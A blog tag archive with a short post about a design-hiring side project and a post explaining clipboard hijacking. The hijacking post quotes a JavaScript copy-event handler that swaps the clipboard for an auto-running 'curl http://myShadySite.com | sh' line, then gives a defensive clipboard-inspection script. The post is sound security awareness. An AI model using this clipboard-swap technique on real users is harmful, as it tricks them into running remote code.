Tag Archives: JavaScript

Helping to hire designers with designchallenge.io

Started a little (well, maybe not exactly that little, given that it wasn’t as quick as I’d thought) project with my friends to aid pre-interview screening of candidates for designer positions through several simple challenges, akin to what HackerRank, Codility etc. do for software developers. For now https://designchallenge.io/ serves only a landing page, but we will hopefully publish more functionality soon-ish.

Tech-wise it’s been (and it still is) a good exercise on the Node.js + Express + Vue.js + TypeScript stack, which I was only vaguely familiar with before, and also on using cloud providers like Heroku to deploy and host everything (well, not exactly everything, as images need to be hosted on S3 or some other storage provider). Quite a lot of knowledge gained, but quite a lot of fun too!

Copying shell commands from websites

There are quite a few websites – like Homebrew, for instance – that offer initial installation in the form of a shell script that downloads an installation binary and runs it (or does some other actions, like saving specific values to a configuration file). I always had some vague concern about copying and running such commands, but then again, you can read those commands and judge for yourself whether they’re malicious or not, right? Yes, but…

I stumbled upon an article today that highlighted how the copied code might not be what it seems – or rather, how a page can replace the copied text with something else: https://briantracy.xyz/writing/copy-paste-shell.html

It’s quite ingenious, really – it hooks the copy event and replaces the clipboard data with another command, one that even ends with a newline so that it runs automatically the moment you paste it into a shell. Here’s the code from the article:

// Runs whenever the user copies from the element with id "copyme"
document.getElementById('copyme').addEventListener('copy', function(e) {
    // Put a different command on the clipboard; the trailing newline makes a shell run it on paste
    e.clipboardData.setData('text/plain',
        'echo "this could have been [curl http://myShadySite.com | sh]"\n'
    );
    // Stop the browser from copying the text the user actually selected
    e.preventDefault();
});

Now, you’d need to land on a frankly malicious website that’d pull such a trick on you, but an XSS on an honest website could also be used to do it. One way to safeguard yourself is to check your clipboard content (I use Alfred for OSX; it has an amazing clipboard history feature), or to paste the copied data into a text editor or any non-shell text field to validate that it’s what you expect it to be.
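To make that check concrete, here is an added example (my own illustration, not code from the linked article or from any project) of a defender-side inspection of clipboard text: a pure function that compares what was visibly selected with what landed on the clipboard and flags the properties that make a pasted command dangerous (content mismatch, the auto-executing trailing newline, hidden or control characters, extra command lines), plus a document-level hook that applies it in the browser. The function names, the document-level listener and the sample selection `brew install foo` are assumptions for this example; the clipboard payload is the one shown above.

```javascript
// Added example (not from the linked article or from this blog): a defender-side
// check for text that is about to be pasted into a shell. Function and hook
// names are hypothetical.

// Pure check: compare what the user saw (the selection) with what ended up on
// the clipboard, and flag properties that make a pasted command dangerous.
function inspectClipboardText(selectedText, clipboardText) {
  const findings = [];

  if (clipboardText !== selectedText) {
    findings.push('clipboard text differs from the visible selection');
  }
  if (/\r?\n$/.test(clipboardText)) {
    findings.push('trailing newline: a shell would run this immediately on paste');
  }
  // Zero-width characters, a BOM, the ESC byte (ANSI sequences) or other C0
  // control characters can hide parts of a command from the reader.
  if (/[\u200B-\u200D\uFEFF\u001B\u0000-\u0008]/.test(clipboardText)) {
    findings.push('hidden or control characters present');
  }
  const lines = (s) => s.split(/\r?\n/).filter((l) => l.trim().length > 0).length;
  if (lines(clipboardText) > lines(selectedText)) {
    findings.push('more command lines on the clipboard than were selected');
  }

  return { safe: findings.length === 0, findings };
}

// Browser hook (assumes the DOM clipboard API; a no-op under Node). A listener
// on the document runs in the bubble phase *after* the element's own copy
// handler, so text that handler placed via setData() is visible through
// getData(). Only a handler that suppressed the default copy can have
// rewritten the clipboard, so the check is skipped otherwise.
function installCopyWatcher(doc, report) {
  doc.addEventListener('copy', (e) => {
    if (!e.defaultPrevented) return; // the real selection is being copied
    const selected = doc.getSelection().toString();
    const placed = e.clipboardData.getData('text/plain');
    const result = inspectClipboardText(selected, placed);
    if (!result.safe) report(result);
  });
}

if (typeof document !== 'undefined') {
  installCopyWatcher(document, (r) =>
    console.warn('Clipboard contents were rewritten on copy:', r.findings));
}

// Constructed sample: an innocuous selection versus the payload from the article.
const sampleSelection = 'brew install foo';
const sampleClipboard = 'echo "this could have been [curl http://myShadySite.com | sh]"\n';
if (typeof document === 'undefined') {
  console.log(inspectClipboardText(sampleSelection, sampleClipboard));
}
```

The browser hook is a heuristic, not a guarantee: a page handler that calls `stopPropagation()` keeps the event from ever reaching the document listener, and a capture-phase listener would run before the rewrite happens. The reliable check remains the manual one above, pasting into a non-shell text field before pasting into the shell; the function is there to show exactly which properties of the pasted text to look at.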

Live and learn!